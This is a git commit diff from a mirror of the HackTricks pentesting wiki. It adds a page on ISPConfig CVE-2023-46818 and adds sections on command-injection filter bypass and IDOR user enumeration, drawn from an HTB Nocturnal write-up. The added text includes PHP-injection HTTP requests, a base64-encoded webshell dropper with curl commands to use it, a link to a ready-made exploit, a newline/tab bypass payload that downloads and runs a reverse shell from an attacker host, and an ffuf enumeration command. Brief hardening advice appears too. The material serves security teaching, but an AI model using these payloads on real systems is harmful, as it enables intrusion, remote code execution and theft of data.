mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig...
- Remove searchindex.js (auto-generated file)
This commit is contained in:
parent
7b609aef63
commit
399a99eefa
@ -430,6 +430,7 @@
|
||||
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
|
||||
- [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
|
||||
- [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
|
||||
- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
|
||||
- [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
|
||||
- [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
|
||||
- [Joomla](network-services-pentesting/pentesting-web/joomla.md)
|
||||
|
@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
|
||||
- [**Golang**](golang.md)
|
||||
- [**GraphQL**](graphql.md)
|
||||
- [**H2 - Java SQL database**](h2-java-sql-database.md)
|
||||
- [**ISPConfig**](ispconfig.md)
|
||||
- [**IIS tricks**](iis-internet-information-services.md)
|
||||
- [**Microsoft SharePoint**](microsoft-sharepoint.md)
|
||||
- [**JBOSS**](jboss.md)
|
||||
|
107
src/network-services-pentesting/pentesting-web/ispconfig.md
Normal file
107
src/network-services-pentesting/pentesting-web/ispconfig.md
Normal file
@ -0,0 +1,107 @@
|
||||
# ISPConfig
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Overview
|
||||
|
||||
ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.
|
||||
|
||||
Key default paths:
|
||||
- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
|
||||
- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
|
||||
|
||||
Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:
|
||||
|
||||
```bash
|
||||
ssh -L 9001:127.0.0.1:8080 user@target
|
||||
# then browse http://127.0.0.1:9001
|
||||
```
|
||||
|
||||
## Language editor PHP code injection (CVE-2023-46818)
|
||||
|
||||
- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
|
||||
- Preconditions:
|
||||
- Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
|
||||
- Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
|
||||
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context
|
||||
|
||||
References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
|
||||
|
||||
### Manual exploitation flow
|
||||
|
||||
1) Open/create a language file to obtain CSRF tokens
|
||||
|
||||
Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.
|
||||
|
||||
2) Inject PHP via records[] and save
|
||||
|
||||
Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:
|
||||
|
||||
```http
|
||||
POST /admin/language_edit.php HTTP/1.1
|
||||
Host: 127.0.0.1:9001
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: ispconfig_auth=...
|
||||
|
||||
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
|
||||
```
|
||||
|
||||
Out-of-band test (observe ICMP):
|
||||
|
||||
```http
|
||||
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
|
||||
```
|
||||
|
||||
3) Write files and drop a webshell
|
||||
|
||||
Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):
|
||||
|
||||
```http
|
||||
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
|
||||
```
|
||||
|
||||
Then write a simple webshell using base64 to avoid bad characters in the POST body:
|
||||
|
||||
```http
|
||||
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
|
||||
```
|
||||
|
||||
Use it:
|
||||
|
||||
```bash
|
||||
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
|
||||
```
|
||||
|
||||
If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
|
||||
|
||||
### Python PoC
|
||||
|
||||
A ready-to-use exploit automates token handling and payload delivery:
|
||||
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
|
||||
|
||||
Example run:
|
||||
|
||||
```bash
|
||||
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
|
||||
```
|
||||
|
||||
### Hardening
|
||||
|
||||
- Upgrade to 3.2.11p1 or later
|
||||
- Disable the language editor unless strictly needed:
|
||||
|
||||
```
|
||||
admin_allow_langedit=no
|
||||
```
|
||||
|
||||
- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
|
||||
- Enforce strong authentication for the built-in `admin` account
|
||||
|
||||
## References
|
||||
|
||||
- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
|
||||
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
|
||||
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
|
||||
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -131,6 +131,37 @@ powershell C:**2\n??e*d.*? # notepad
|
||||
../linux-hardening/bypass-bash-restrictions/
|
||||
{{#endref}}
|
||||
|
||||
##### Newline and tab blacklist bypass (space and metacharacters filtered)
|
||||
|
||||
Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can:
|
||||
|
||||
- Inject a newline to start a new command
|
||||
- Use tabs as whitespace where space is blocked
|
||||
|
||||
Example payload for a password-like field reaching a shell (URL-encoded):
|
||||
|
||||
```
|
||||
0xdf%0abash%09-c%09"id"%0a
|
||||
```
|
||||
|
||||
The resulting process executes as two lines:
|
||||
|
||||
```
|
||||
zip -x './backups/*' -r -P 0xdf
|
||||
bash -c "id"
|
||||
```
|
||||
|
||||
Chaining without `&`: fetch and execute a reverse shell in separate lines:
|
||||
|
||||
```
|
||||
0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a
|
||||
```
|
||||
|
||||
Notes
|
||||
- Newlines are command separators for POSIX shells; tabs are valid whitespace.
|
||||
- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not.
|
||||
- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`).
|
||||
|
||||
### Node.js `child_process.exec` vs `execFile`
|
||||
|
||||
When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API.
|
||||
@ -170,5 +201,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
|
||||
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
|
||||
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
|
||||
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
|
||||
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
|
||||
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do
|
||||
done
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Error-response oracle for user/file enumeration
|
||||
|
||||
When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle:
|
||||
|
||||
- Non-existent username → "User not found"
|
||||
- Bad filename but valid extension → "File does not exist" (sometimes also lists available files)
|
||||
- Bad extension → validation error
|
||||
|
||||
With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users:
|
||||
|
||||
```bash
|
||||
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
|
||||
-b 'PHPSESSID=<session-cookie>' \
|
||||
-w /opt/SecLists/Usernames/Names/names.txt \
|
||||
-fr 'User not found'
|
||||
```
|
||||
|
||||
Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage.
|
||||
|
||||
---
|
||||
## 2. Real-World Case Study – McHire Chatbot Platform (2025)
|
||||
|
||||
@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
|
||||
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds)
|
||||
* [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
|
||||
* [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
|
||||
* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user